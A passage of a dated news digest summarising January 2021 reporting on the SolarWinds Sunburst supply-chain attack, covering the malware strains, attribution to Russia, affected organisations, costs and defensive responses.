Sunburst uses randomly generated URL paths for HTTP(S) POST requests that are different from HTTP(S) GET requests. Further, instead of sending the encrypted data directly, as when the data is greater than 10,000 bytes, the data is steganographically sent in a faux JSON blob. On receipt, the attacker will need to decode and concatenate all the Message chunks, skipping junk chunks where the Timestamp second bit is not set.
Ref - Symantec
_______________________________________________________________________________________
(January 22, 2021)
FSB alerted Russian businesses about retaliation for the SolarWinds hack
The Russian intelligence agency FSB has issued a security alert this week warning Russian organizations of potential cyberattacks launched by the United States in response to the SolarWinds supply chain attack. The alert was issued after officials of the new Biden administration declared that attacks like the SolarWinds ones could trigger a response from their government.
Ref - Security Affairs
_______________________________________________________________________________________
(January 21, 2021)
The attack timeline of Solarwinds breach
According to the SolarWinds attack timeline, the attackers started accessing SolarWinds in September 2019, a week after they injected test code. Next month, they stopped infecting test code. In February 2020, the Solarihate backdoor was compiled and deployed. In March, the target profiling and distribution of SUNBURST started. In May, actual hands-on-keyboard attacks started and TEARDROP malware was activated. In June, attackers removed malware from the SolarWinds build environment. From this point to December, hands-on-keyboard attacks continued that is when the supply-chain attacks were discovered.
Ref - Security Affairs
_______________________________________________________________________________________
(January 21, 2021)
How SolarWinds hackers remained undetected?
Microsoft's security researchers have outlined some of the operational security used by SolarWinds hackers that allowed them to remain undetected for long enough. Hackers renamed tools and binaries and put them in folders that looked like files and programs already present on a machine. They even prepared special firewall rules to minimize outgoing packers for certain protocols and then removed the rules after finishing reconnaissance
Ref - ZDNet
_______________________________________________________________________________________
(January 21, 2021)
The SolarWinds hackers had put in painstaking planning to avoid detection
Microsoft researchers estimate that the SolarWinds attackers spent a month or so in selecting victims and preparing unique Cobalt Strike implants as well as command-and-control (C2) infrastructure. The attackers also tried to separate the Cobalt Strike loader's execution from the SolarWinds process in order to protect the Cobalt Strike implant. Each Cobalt Strike DLL implant was prepared to be unique per machine and avoided any overlap and reuse of folder name, file name, and other details.
_______________________________________________________________________________________
(January 20, 2021)
Building the threat context for the SolarWinds incident
Blueliv has identified two vulnerabilities that affected SolarWinds Orion and could have been leveraged by the attackers: CVE-2020-14005 and CVE-2020-13169. Several severe ATT&CK patterns were also noted, particularly via variations of Cross-Site Scripting (XSS) associated with the vulnerability.
_______________________________________________________________________________________
(January 20, 2021)
Old-guard, ‘Cowboy IT’ caused the SolarWinds supply chain compromise
According to James Stanger, chief technology evangelist, CompTIA, most organizations continue to pursue traditional measures based on a firewall-first, signature-based, trusted-partner mindset. This mindset creates toxic IT solutions and leads to the practice of making IT and cybersecurity workers continually clean up after bad code, hastily implemented platforms, and poor business procedures.
Ref - SC Media
_______________________________________________________________________________________
(January 20, 2021)
Microsoft shares details on how hackers evaded detection in SolarWinds attack
Microsoft has shared details on how the SolarWinds hackers were able to remain undetected by hiding their malicious activity inside the networks of breached companies. The report shares new details regarding the Solorigate second-stage activation, including the steps and tools used to deploy custom Cobalt Strike loaders (Teardrop, Raindrop, and others) after dropping the Solorigate (Sunburst) DLL backdoor.
Ref - Bleeping Computer
_______________________________________________________________________________________
(January 20, 2021)
More details regarding Solorigate second-stage activation revealed
Microsoft detailed the hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders, including the loader dubbed TEARDROP by FireEye and a variant named Raindrop by Symantec.
Ref - Microsoft
_______________________________________________________________________________________
(January 20, 2021)
Malwarebytes was targeted via Microsoft 365 API Calls
To target Malwarebytes, instead of using the SolarWinds Orion network-management system, the attackers had abused applications with privileged access to Microsoft Office 365 and Azure environments. The Microsoft Security Response Center flagged suspicious activity from a third-party email-security application used with Malwarebytes’ Microsoft Office 365 hosted service on Dec. 15.
_______________________________________________________________________________________
(January 19, 2021)
SolarWinds attack has shown four separate paths to breach Microsoft 365 cloud
The perpetrators behind the SolarWinds supply-chain attack were observed leveraging four separate techniques to bypass identity and access management protections. These techniques include the Golden SAML attack using stolen ADFS token-signing certificates, adding a new attacker-controlled federated Identity Provider (IdP) capable of forging tokens, compromising the credentials of high-privileged on-prem accounts synced to Microsoft 365, and adding rogue credentials and exploiting their legitimate assigned permissions.
_______________________________________________________________________________________
(January 19, 2021)
SolarWinds hackers accessed internal emails of Malwarebytes
Cybersecurity firm Malwarebytes confirmed that the threat actor behind the SolarWinds supply-chain attack was able to gain access to some company emails. The company did not find evidence of a compromise or unauthorized access to internal production or on-premises environments. The attackers exploited an Azure Active Directory weakness that allowed access to a limited subset of internal company emails.
Ref - Bleeping Computer
_______________________________________________________________________________________
(January 19, 2021)
SolarWinds hackers used 7-Zip code to hide ‘Raindrop’
The ongoing analysis of the SolarWinds supply-chain attack uncovered a fourth malicious tool that researchers call Raindrop and was used for distribution across computers on the victim network. To hide the malicious functionality, the hackers used a modified version of the 7-Zip source code to compile Raindrop as a DLL file.
Ref - Bleeping Computer
_______________________________________________________________________________________
(January 19, 2021)
SolarWinds attack showed a new dimension in cyber-espionage tactics
The epic SolarWinds attack signals a new normal for cyber espionage. The recent campaign illustrates how nation-state attackers are going after real-time information and how challenging it is for targeted organizations to detect it. It’s a new dimension of nation-state hacking with all of the Office 365 and Azure AD Cloud out there.
Ref - Dark Reading
_______________________________________________________________________________________
(January 19, 2021)
Remediation and hardening strategies to defend against UNC2452
Recent research has disclosed the methodologies used by UNC2452 and other threat actors to move laterally from on-premises networks to the Microsoft 365 cloud. It also provides details about how organizations can proactively harden their environments and remediate environments where similar techniques have been observed.
Ref - FireEye
_______________________________________________________________________________________
(January 19, 2021)
Symantec researchers discover fourth malware strain used in SolarWinds attack
Researchers from cyber-security firm Symantec have identified another malware strain, dubbed Raindrop, that was used during the SolarWinds supply chain attack. The other already discovered malware are Sunspot, Sunburst (Solorigate), and Teardrop. Raindrop was used as a loader for the Cobalt Strike Beacon, which the intruders later used to escalate and broaden their access inside a hacked IT network.
Ref - ZDNet
_______________________________________________________________________________________
(January 19, 2021)
Tactics used by the SolarWinds hackers may be copied by other groups as well
After the SolarWinds attack, researchers are bracing for an increase in the popularity of supply chain attacks among other attackers. Other actors will obviously adapt these techniques because they go after what works. SAML token manipulation is a risk for virtually all cloud users, not just those on Azure, as happened in the case of SolarWinds attack.
_______________________________________________________________________________________
(January 18, 2021)
Planned supply chain attacks may have devastating effects
Well planned supply chain attacks can have a devastating real-world impact on a large number of organizations within the blast radius of the original compromise, like the case of the recent SolarWinds attacks. Detecting the SUNBURST backdoor implanted in SolarWinds Orion is difficult to accomplish with existing automated capabilities because the backdoor was delivered through a legitimate software update to a known monitoring and management tool. Many organizations do not keep access logs long enough to determine whether or not a successful compromise occurred.
_______________________________________________________________________________________
(January 18, 2021)
Symantec discovers new Raindrop malware in SolarWinds investigation
Symantec has uncovered an additional piece of malware used in the SolarWinds attacks, which was used against a select number of victims that were of interest to the attackers. Raindrop (Backdoor.Raindrop) is a loader that delivers a payload of Cobalt Strike. Symantec has seen no evidence of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst.
_______________________________________________________________________________________
(January 18, 2021)
Google Cloud: We do use some SolarWinds, but we weren't affected by mega hack
Google Cloud's first chief information security office (CISO) Phil Venables has said that Google's cloud venture does use software from vendor SolarWinds, but it is used in a limited and contained manner. Besides using security layers, such as Titan Chips for Google host machines and Shielded Virtual Machines, Google also verifies that software is built and signed in an approved isolated build environment from properly checked-in code that has been reviewed and tested.
_______________________________________________________________________________________
(January 18, 2021)
SolarWinds hack is quickly reshaping Congress’s cybersecurity agenda
In the wake of the discovery of the SolarWinds breach, the incoming Biden administration committed to making cybersecurity a top priority. The Biden team has announced a Rescue Plan that calls for around $10 billion in cybersecurity spending, including $690 million for CISA to improve security monitoring and incident response at the agency.
_______________________________________________________________________________________
(January 18, 2021)
New updates in Infinity SOC can pinpoint the presence of Sunburst infection
CheckPoint has updated its Infinity SOC offering, enabling it to pinpoint the presence of the Sunburst incident of compromise across the client’s network. According to CheckPoint, administrators can leverage the cloud-based platform to search for Sunburst indicators within network, cloud, and endpoint environments. The solution also provides event investigation tools to drill-down into findings to validate and plan remediation steps.
_______________________________________________________________________________________
(January 18, 2021)
Monetary Authority of Singapore (MAS) announces new rules for the financial sector after SolarWinds breach
All financial services and e-payment firms in Singapore must, from Jan 18, follow a new set of central banking rules to better mitigate technology risks in the wake of a recent cyberattack that impacted organizations around the world. MAS now requires all financial institutions to assess the suppliers of their technology vendors.
Ref - The Straits Times
_______________________________________________________________________________________
(January 17, 2021)
Cyber threat intel analysis of SolarWinds' identified indicators of compromise
Owing to the scale of the SolarWinds breach, several cybersecurity organizations, principally FireEye, and other companies such as Open Source Context, released lists of indicators of compromise (IoCs). A majority of the IoCs, 14 out of 18 to be exact, were first registered more than five years ago.
Ref - CircleID
_______________________________________________________________________________________
(January 15, 2021)
Some UW campuses could have been exploited in Solarwinds breach
The national cyberattack that targeted the SolarWinds computer network monitoring software could have impacted some University of Wisconsin (UW) System campuses that use it. The UW system officials won't say which campuses use solar winds or whether they were impacted by a suspected Russian hack.
Ref - WPR
_______________________________________________________________________________________
(January 15, 2021)
Understanding third-party attacks after SolarWinds breach
The SolarWinds hack is just one example of a third-party, supply chain compromise. And while the scale of the SolarWinds hack is certainly novel, third-party compromises are not. In addition, third-party compromises are just 1-of-6 common root causes of breaches. The other root causes are phishing, malware, unencrypted data, software vulnerabilities, and inadvertent employee mistakes.
Ref - Help Net Security
_______________________________________________________________________________________
(January 15, 2021)
SolarWinds Orion vulnerability - SonicWall product notification
SonicWall Capture Labs threat researchers have investigated the SolarWinds Orion vulnerability. They published four signatures that identify malicious activity against affected SolarWinds Orion versions, and two additional application notifications that detect if an organization has SolarWinds Orion deployed within its network. These signatures are applied automatically to SonicWall firewalls with active security subscriptions.
_______________________________________________________________________________________
(January 15, 2021)
SolarWinds fallout making secure communications the first line of defense
After the SolarWinds breach, the Operational Security measures addressing sensitive communications are imperative as a critical first line of defense. This ensures that enterprises and government agencies can defend themselves against further compromise and to establish strong, resilient crisis response plans to prevent and mitigate future intrusions.
Ref - FCW
_______________________________________________________________________________________
(January 15, 2021)
SolarWinds close to figuring out how cyberattack occurred
Austin-based SolarWinds, the software company at the center of what is considered one of the most sophisticated cyberattacks in U.S. history, said it believes it is closer to understanding how the attack was carried out. The company has reverse-engineered the code used in the attack to better understand how it was deployed.
Ref - GT
_______________________________________________________________________________________
(January 15, 2021)
SUNBURST - No one saw it coming
The attack on SolarWinds, dubbed Sunburst, loaded a Trojan into the SolarWinds Orion Platforms, thus compromising the networks of SolarWinds’ clients. US-based organizations were targets of nearly 80% of the attacks, though organizations based in other countries including Belgium, Canada, Israel, Mexico, Spain, and the UAE were also affected. Now organizations must consider that more threat actors are likely to mimic the success of the Sunburst attack.
_______________________________________________________________________________________
(January 15, 2021)
SolarWinds attack - What has been done right and what has gone wrong
The “good” thing about SUNBURST is that it is created in .NET language, making it relatively easy to decompile and know what the attacker has programmed. There have been reactions that have worked, such as Microsoft hijacking the domain under which the whole attack is based (avsavmcloud.com).
_______________________________________________________________________________________
(January 14, 2021)
Dell product response to SolarWinds
Dell has disclosed that the SolarWinds attack does not impact its products. In wake of the recent SolarWinds attacks, Dell has revealed that it does not embed or deliver the SolarWinds Orion software within any of its Dell or Dell EMC products.
_______________________________________________________________________________________
(January 14, 2021)
SolarWinds SUNSPOT malware - Threat advisory
The developers of SUNSPOT were very careful in designing the malware. They made sure that the code would be properly inserted and remained undetected. Upon entering the system, SUNSPOT starts to spawn a new thread to determine if the Orion software is being built and, if so, hijack the build operation to inject SUNBURST.
_______________________________________________________________________________________
(January 14, 2021)
The SolarWinds attack poses a challenge for contractors
The SolarWinds incident could just as easily have occurred with a construction management company or general contractor using the construction industry’s various project management software programs. Such digital attacks can intercept sensitive information, divert funds, and hold hostage a company’s computer systems.
Ref - National Law Review
_______________________________________________________________________________________
(January 14, 2021)
Key lessons from SolarWinds attacks
The most important learning from the SolarWinds attack is that all computer systems are vulnerable to hacking. The second important learning is that security is not just about technology, but also about governance, policies, processes, and people. Thirdly, security should be baked into the software development life cycle and not be bolted on after the fact.
Ref - Forbes
_______________________________________________________________________________________
(January 14, 2021)
Analyzing SolarWinds exposure with Cisco Endpoint Security Analytics
While digging out of the Solarwinds mess, Cisco researchers were able to connect local Windows processes to domains that were reported in the IOC lists. Cisco Endpoint Security Analytics (CESA) allows users to associate what endpoint accessed what domain, as well as what software processes and protocols were used
Ref - Cisco
_______________________________________________________________________________________
(January 14, 2021)
SolarWinds hack forces reckoning with supply-chain security
After working in recent weeks to assess their exposure to the attack on the software provider, businesses have turned to probing their other vendors’ security, re-evaluating vetting processes for partners, and even pausing updates to applications. The fallout from the SolarWinds hack is pressuring firms to more aggressively review their technology.
Ref - WSJ
_______________________________________________________________________________________
(January 14, 2021)
SolarWinds breach could cost cyber insurance firms around $90 million
Cyber insurance vendors are expected to spend $90 million on incident response and forensic services for clients who were compromised by the SolarWinds hackers. Although the SolarWinds attack is a cyber catastrophe from a national security perspective, insurers may have narrowly avoided a catastrophic financial incident to their businesses.
Ref - CRN
_______________________________________________________________________________________
(January 14, 2021)
How to avoid SolarWinds type attacks
The Linux Foundation has provided some suggestions on how to avoid SolarWinds type attacks. It includes hardening software build environments, moving towards verified reproducible builds, changing tools & interfaces so unintentional vulnerabilities are less likely, educating developers, using vulnerability detection tools when developing software, improving widely-used OSS, implementing OpenChain, and others.
Ref - ZDNet
_______________________________________________________________________________________
(January 14, 2021)
Increasing resilience against Solorigate and other sophisticated attacks with Microsoft Defender
According to Microsoft, the 365 Defender, and Azure Defender can deliver unified, intelligent, and automated security across domains for end-to-end threat visibility for SolarWinds type of attacks. In addition, for having comprehensive visibility and rich investigation tools, Microsoft 365 Defender, and Azure Defender can help organizations continuously improve security posture.
Ref - Microsoft
_______________________________________________________________________________________
(January 14, 2021)
FireEye not ready to ascribe SolarWinds hack to Russia
The cybersecurity firm FireEye said Tuesday that it has not seen enough evidence to positively identify the hackers behind the ongoing SolarWinds Orion hack to Russian entities. FireEye is credited as the first to detect an intrusion in SolarWinds Orion, an IT management software. Although FireEye is not attributing the attack to Russia yet.
Ref - FCW
_______________________________________________________________________________________
(January 13, 2021)
SolarLeaks website offering files allegedly obtained from SolarWinds breach
Someone has set up a website named SolarLeaks where they are offering to sell gigabytes of files allegedly obtained as a result of the recently disclosed SolarWinds breach. The SolarLeaks website offering source code allegedly obtained from Microsoft, Cisco, SolarWinds, and FireEye.
Ref - SecurityWeek
_______________________________________________________________________________________
(January 13, 2021)
More SolarWinds victims are expected
The number of federal agencies hit by the SolarWinds Orion breach will likely surpass the White House’s tally of 10, according to the director of the National Counterintelligence and Security Center. The number of organizations affected by the SolarWinds hack will likely rise as investigators continue to manage the fallout.
Ref - GCN
_______________________________________________________________________________________
(January 13, 2021)
SolarWinds attackers could have targeted Mimecast pursuing multiple paths
The discovery of a data breach at email service provider Mimecast could indicate attackers behind the massive SolarWinds incident may have pursued multiple paths to infiltrate target organizations. However, Mimecast no longer uses the SolarWinds Orion network management software.
Ref - Dark Reading
_______________________________________________________________________________________
(January 13, 2021)
Microsoft President: SolarWinds attack violated ‘norms and rules’ of government activities
In a pre-recorded keynote address during the digital CES 2021 conference, Microsoft President Brad Smith has called on governments of the world to hold to a higher standard to prevent supply chain attacks similar to SolarWinds Orion. In addition, the tech industry will need to work with both government and non-governmental agencies to address such critical cybersecurity issues.
Ref - CRN
_______________________________________________________________________________________
(January 13, 2021)
SolarWinds hack followed years of warnings of weak cybersecurity
The Cyberspace Solarium Commission, which was created to develop strategies to thwart sizable cyber-attacks, had presented a set of recommendations to Congress in March that included additional safeguards to ensure more trusted supply chains. More than 75 of the highest priority recommendations were not fully addressed by the agencies.
Ref - Bloomberg
_______________________________________________________________________________________
(January 13, 2021)
SolarWinds risk assessment resources for Microsoft 365 and Azure
Several government and private organizations, including Microsoft, have released a wealth of information and tools to assess risk from SolarWinds-like attacks. These resources can help organizations prepare themselves to respond to SolarWinds attack-related appropriately.
_______________________________________________________________________________________
(January 12, 2021)
SolarWinds claimed to have found the source of a massive cyberattack
Security software provider SolarWinds revealed that it has found the source of a highly sophisticated malicious code injection that it believes was used by the perpetrators of the recent cyberattack on the company and its clients, including federal government agencies. It was able to reverse engineer the code, allowing it to learn more about the tool that was developed and deployed into the built environment.
Ref - The Street
_______________________________________________________________________________________
(January 12, 2021)
SolarWinds attack - Involvement of Mimecast customers further escalate the risks
The Mimecast hackers used tools and techniques that link them to the hackers who broke into Austin, Texas-based SolarWinds Corp. This new revelation by Mimecast potentially adds thousands of victims to the years-long intelligence operation and likely aimed at gaining access to email systems.
_______________________________________________________________________________________
(January 12, 2021)
New findings in SolarWinds attack fills out the timeline of Russia-linked campaign
Based on a continuing investigation, SolarWinds Corp. has said that the Russia-linked hackers, who accessed U.S. government systems and corporate networks via SolarWinds Orion supply chain attacks, were accessing its systems since early September 2019. A month later, a version of the company’s Orion Platform software was found, that appears to have contained modifications designed to test the hacker’s ability to insert malicious code into the system.
_______________________________________________________________________________________
(January 12, 2021)
Cisco’s response towards the SolarWinds Orion platform attack
Cisco has provided updates on the investigation process, answers to common questions, available Indicators of Compromise (IOCs), and recommendations for its customers around the recent SolarWinds attacks. Cisco said that it was using Orion installations with a small number of Cisco assets.
_______________________________________________________________________________________
(January 12, 2021)
SUNSPOT and new malware family associations
In its recent update, Rapid7 talks about two recent developments regarding the SolarWinds attacks. First is about CrowdStrike’s technical analysis of the "SUNSPOT" malware that was used to insert the SUNBURST backdoor into SolarWinds Orion software builds. Another is the technical analysis from researchers at Kaspersky about their discovery of feature overlap between the SUNBURST malware code and the Kazuar backdoor.
Ref - Rapid7
_______________________________________________________________________________________
(January 12, 2021)
The perpetrators spent months inside SolarWinds’ software
New research into the SolarWinds attack shows the perpetrators spent months inside the company’s software development labs, honing their attack before inserting malicious code into updates that SolarWinds then shipped to thousands of customers. And such insidious methods could be repurposed against many other major software providers as well.
Ref - Krebs on Security
_______________________________________________________________________________________
(January 12, 2021)
'SolarLeaks' website claims to sell data stolen in SolarWinds attacks
A website named 'SolarLeaks' is selling data they claim was stolen from companies confirmed to have been breached in the SolarWinds attack. The website hosted on the domain solarleaks[.]net claims to be selling the stolen data from Microsoft, Cisco, FireEye, and SolarWinds.
Ref - Bleeping Computer
_______________________________________________________________________________________
(January 12, 2021)
Mimecast certificate was compromised by hackers for Microsoft authentication
Mimecast has disclosed that a sophisticated threat actor had compromised a Mimecast certificate used to authenticate several of the company’s products to Microsoft 365 Exchange Web Services.
_______________________________________________________________________________________
(January 12, 2021)
New SolarWinds CEO sets out a recovery path to pull through the major attack
According to Sudhakar Ramakrishna, the new CEO of SolarWinds, the most crucial of the next steps will involve securing SolarWinds’ internal environment through deploying additional, robust threat protection and threat hunting software on its network, particularly across developer environments.
_______________________________________________________________________________________
(January 12, 2021)
Kaspersky Lab reveals evidence on SolarWinds breach
Kaspersky Lab has said that the SolarWinds hackers may have hailed from the Turla malware group, which is linked to Russia's FSB security service. Referring to the hidden backdoor secretly implanted in SolarWinds' Orion product, several features are discovered that overlap with a previously identified backdoor known as Kazuar.
Ref - The Register
_______________________________________________________________________________________
(January 12, 2021)
Third malware strain identified in SolarWinds breach
Cyber-security firm CrowdStrike said that it has identified a third malware strain directly involved in the recent SolarWinds hack. Named Sunspot, this finding adds to the previously discovered SUNBURST (Solorigate) and Teardrop malware strains. Crowdstrike believes that SUNSPOT malware was actually the first one used.
Ref - ZDNet
_______________________________________________________________________________________
(January 12, 2021)
FBI investigating Russian-linked postcard sent to FireEye CEO after uncovering SolarWinds incident
The FBI is investigating a mysterious postcard sent to the home of cybersecurity firm FireEye’s chief executive. The postcard was sent just a few days after the organization had found initial evidence of a suspected Russian hacking operation on dozens of U.S. government agencies and private American companies. U.S. officials familiar with the postcard are investigating whether it was sent by people associated with a Russian intelligence service due to its timing and content. The sender was attempting to “troll” or push the company off the trail by intimidating a senior executive.
Ref - Reuters
_______________________________________________________________________________________
(January 11, 2021)
More details revealed about the SUNBURST attack
SolarWinds claims that it has found a highly sophisticated and novel malicious code injection source the perpetrators used to insert the SUNBURST malicious code into builds of our Orion Platform software. By managing the intrusion through multiple servers based in the US and mimicking legitimate network traffic, the attackers were able to circumvent threat detection techniques employed by both SolarWinds, other private companies, and the federal government.
Ref - SolarWinds
_______________________________________________________________________________________
(January 11, 2021)
Indicators of Compromise for SUNBURST malware
Several of the SolarWinds attack-related IOCs published by researchers published so far indicate that a backdoored SolarWinds Orion update has been installed, but there is no way to check if that backdoor was used by attackers. The network-based events suggested by Netresec indicate that a client has been actively targeted and the SUNBURST backdoor has progressed beyond the initial mode of operation. According to this research, Palo Alto was also a targeted victim of the SUNBURST attack.
Ref - Netresec
_______________________________________________________________________________________
(January 11, 2021)
SolarWinds attack one of the most sophisticated and complex attack in history
The new CEO of SolarWinds has described the recent attacks on SolarWinds as one of the most complex and sophisticated cyberattacks in history. SolarWinds, KPMG, and CrowdStrike were able to locate the malicious code injection source, and reverse-engineer it to learn more about the tool that was developed and deployed into SolarWinds’ build environment.
_______________________________________________________________________________________
(January 11, 2021)
SolarWinds attack may cost as much as $100 billion
According to recent research, American businesses and government agencies may need to spend more than $100 billion over many months to contain and fix the damage from the Russian hack against the SolarWinds software used by so many Fortune 500 companies and U.S. government departments.
_______________________________________________________________________________________
(January 11, 2021)
A stealthy code was used to launch the SolarWinds hacking attack
SolarWinds says that it has identified the malicious code that attackers used to manipulate its software and remain undetected for months. The code was designed to inject another piece of custom malicious software into Orion without arousing the suspicion of our software development and build teams.
Ref - Cyber Scoop
_______________________________________________________________________________________
(January 11, 2021)
SolarWinds breach could be linked to Turla APT
New details disclosed about the Sunburst backdoor, which was used in the sprawling SolarWinds supply-chain attack, potentially link it to previously known activity by the Turla APT group. Researchers at Kaspersky have uncovered several code similarities between Sunburst and the Kazuar backdoor.
Ref - Threatpost
_______________________________________________________________________________________
(January 11, 2021)
SolarWinds supply chain attack is a lesson to learn
After all the recent discoveries made about the SolarWinds hack, it is already clear that the scope is extensive, and the full impact will likely prove to be devastating. Organizations should attempt to create a "cyber kill chain" for supply chain compromises, in order to prevent, disrupt, or at least quickly detect such incidents before weaponized software has the opportunity to cause damage.
Ref - DarkReading
_______________________________________________________________________________________
(January 11, 2021)
There could be more undisclosed federal victims of SolarWinds breach: CISA
Brandon Wales, CISA’s acting director, has said that the number of federal agencies breached in a suspected Russian espionage campaign will likely increase as the investigation continues. Though, the number will remain extremely small because of the highly targeted nature of this campaign. And that is going to be true for both government and private-sector entities compromised.
Ref - Cyber Scoop
_______________________________________________________________________________________
(January 11, 2021)
New details emerged from an investigation of SUNBURST
Security experts are providing an update on the investigation thus far and an important development that could bring closer to understanding how this serious attack was carried out. The experts believe that they have found a highly sophisticated and novel malicious code injection source the perpetrators used to insert the SUNBURST malicious code into builds of the Orion Platform software.
Ref - Orange Matter
_______________________________________________________________________________________
(January 11, 2021)
The attacker behind the SolarWinds breach also targeted O365 accounts
The threat actors behind the SolarWinds attack appear to have also compromised Microsoft 365 and Azure Applications accounts. Once the threat actor has impersonated a privileged Azure AD account, they are likely to further manipulate the Azure/M365 environment (action on objectives in the cloud).
Ref - Duo
_______________________________________________________________________________________
(January 11, 2021)
SUNBURST backdoor having shared feature with Russian APT malware
Kaspersky researchers have found that the Sunburst backdoor shows some feature overlaps with Kazuar, a .NET backdoor tentatively linked to the Russian Turla hacking group. The group is the main suspect behind attacks targeting the Pentagon and NASA, the U.S. Central Command, and the Finnish Foreign Ministry.
Ref - Bleeping Computer
_______________________________________________________________________________________
(January 11, 2021)
The SolarWinds hack is different than previous breaches
What sets the SolarWinds attack apart from previous incidents is its sheer scale. The company has over 300,000 customers worldwide, according to filings made to the U.S. Securities and Exchange Commission. Throughout 2020, SolarWinds sent out software updates to roughly 18,000 of them.
Ref - Foreign Policy
_______________________________________________________________________________________
(January 11, 2021)
Technical analysis of SUNSPOT malware
CrowdStrike is providing a technical analysis of a malicious tool (SUNSPOT) that was deployed into the built environment to inject this backdoor into the SolarWinds Orion platform without arousing the suspicion of the development team charged with delivering the product. SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.
Ref - CrowdStrike
_______________________________________________________________________________________
(January 8, 2021)
Chris Krebs and Alex Stamos team up against SolarWinds attacks
SolarWinds, which has been embroiled in a recent, wide-scale hack, has called in two security powerhouses for help: Former director of the Cybersecurity and Infrastructure Security Agency (CISA) Chris Krebs, and former Facebook security executive Alex Stamos.
Ref - Threatpost
_______________________________________________________________________________________
(January 8, 2021)
Spotting post-compromise threat activity in Microsoft Cloud Environments
CISA released an alert, stating that it has observed an APT actor using compromised applications in a victim’s Microsoft 365 (M365)/Azure environment. CISA has also seen this APT actor utilizing additional credentials and Application Programming Interface (API) access to cloud resources of private and public sector organizations.
Ref - US-CERT
_______________________________________________________________________________________
(January 8, 2021)
The SolarWinds attacker used password guessing and password spraying attacks
The US Cybersecurity and Infrastructure Security Agency (CISA) has stated that the threat actor behind the SolarWinds hack also used password guessing and password spraying attacks to breach targets as part of its recent hacking campaign and didn't always rely on the trojanized updates as its initial access vector.
Ref - ZDNet
_______________________________________________________________________________________
(January 7, 2021)
US Judiciary adding safeguards and security procedures after SolarWinds hack
The Administrative Office of the U.S. Courts is investigating a potential compromise of the federal courts' case management and electronic case files system. The US Judiciary is also working on immediately adding extra safeguards and security procedures to protect the highly sensitive court documents (HSDs) filed with the courts, by having security audits related to vulnerabilities, and defining new rules for storing confidential documents.
Ref - Bleeping Computer
_______________________________________________________________________________________
(January 7, 2021)
A 'Severity-Zero alert' led to the discovery of SolarWinds breach
FireEye CEO shared some insight on the cyberattack on the security firm that was the first clue to a massive and wide-ranging attack campaign. He described how his company first recognized the serious attack it had suffered, describing how a newly registered phone using a FireEye user account was the first indication of malicious activity.
Ref - Dark Reading
_______________________________________________________________________________________
(January 7, 2021)
Sealed U.S. court records compromised in SolarWinds breach
Backdoored products by network software firm SolarWinds may have jeopardized the privacy of countless sealed court documents on file with the U.S. federal court system. An apparent compromise of the confidentiality of the Case Management/Electronic Case Files system due to some discovered vulnerabilities currently is under investigation.
Ref - Krebs on Security
_______________________________________________________________________________________
(January 6, 2021)
SolarWinds hackers had access to Microsoft O365 email server
The US Department of Justice confirmed that the Russian state-sponsored hackers behind the SolarWinds supply chain attack targeted its IT systems, and potentially accessed the O365 mailboxes of some of the users. The number of impacted DOJ employees is currently believed to be around 3,000 to 3,450.
Ref - ZDNet
_______________________________________________________________________________________
(January 5, 2020)
Concerns over Microsoft’s source code exposure in the SolarWinds attack
Microsoft revealed that its investigation of SolarWinds breach had found no evidence of unauthorized access to its production services or customer data, but that effort did uncover another attack attempt. The tech giant has an “inner source approach” that makes source code viewable within Microsoft. Even so, such an attempt raises some important questions about the types of risks that Microsoft might still be facing as a result of this exposure.
Ref - Security Boulevard
_______________________________________________________________________________________
(January 5, 2020)
The U.S. now formally blames Russia for SolarWinds breach
Four US cyber-security agencies, including the FBI, CISA, ODNI, and the NSA, have released a joint statement today formally accusing the Russian government of orchestrating the SolarWinds supply chain attack. US officials said that an Advanced Persistent Threat (APT) actor, likely Russian in origin, was responsible for the SolarWinds hack.
Ref - ZDNet
_______________________________________________________________________________________
(January 5, 2021)
Critical infrastructure could join the list of potential targets
Researchers have started to piece together a picture of the SolarWinds intrusion using the information found in the networks of U.S. agencies and companies. But there’s another potential group of victims who haven’t yet disclosed any attacks, in part because they may not yet know. That is America’s critical infrastructure, which includes everything from bridges and airports to the electrical grid and hydroelectric dams.
Ref - Bloomberg
_______________________________________________________________________________________
(January 5, 2021)
SolarWinds breach raises concerns over Windows updates
Recently, Microsoft announced that its Windows source code had been viewed by the Solarwinds attackers, raising concerns among Microsoft customers. The SolarWinds attack has raised serious questions about how safe companies (and government agencies) are when OS or software updates roll out.
Ref - Computer World
_______________________________________________________________________________________
(January 4, 2021)
SolarWinds facing a class-action lawsuit for alleged securities violations
The first class-action lawsuit brought against SolarWinds following its breach accuses the company of making materially false and misleading statements about its security posture throughout 2020. The suit alleges that SolarWinds, outgoing CEO and CFO made false and/or misleading statements in regulatory filings with the U.S. Securities and Exchange Commission in February, May, August, and November of 2020.
Ref - CRN
_______________________________________________________________________________________
(January 4, 2021)
SolarWinds confirms malware targeted crocked Orion product
The extent and impact of the SolarWinds hack have become even more apparent and terrifying over the holiday break. SolarWinds identified the malware that exploited the flaws introduced to Orion products. The SUPERNOVA malware was separately placed on a server that requires unauthorized access to a customer’s network and is designed to appear to be part of a SolarWinds product.
Ref - The Register
_______________________________________________________________________________________
(January 4, 2021)
SolarWinds hack - Microsoft’s software blueprints acquired but not altered
The latest results of an ongoing investigation by Microsoft revealed that the sophisticated attackers behind the SolarWinds cyber-espionage operation were able to use compromised accounts to access the blueprints of Microsoft’s software. Attackers were able to acquire the blueprints, but they could not alter them, Microsoft said.
Ref - Portswigger
_______________________________________________________________________________________
(January 4, 2021)
The SolarWinds attack could be worse than expected
The SolarWinds attack may prove to be even more damaging to the U.S. national security and business prosperity. The latest reports reveal that Russians may even have accessed the crown-jewels of Microsoft software stack: Windows and Office. Though there were no explosions, no deaths, this incident was like the Pearl Harbor of American IT.
Ref - ZDNet
______________________________________________________________________________________
(January 4, 2021)
SolarWinds hack - A global attack
Recent evidence suggests that a number of cyber-defense missteps may have helped the attackers in their efforts. Early warning sensors placed by Cyber Command and the National Security Agency (NSA) evidently failed, and the attackers were using US-based servers to prevent getting caught.
_______________________________________________________________________________________
(January 4, 2021)
UNC2452 hacker continues to tickle security researchers
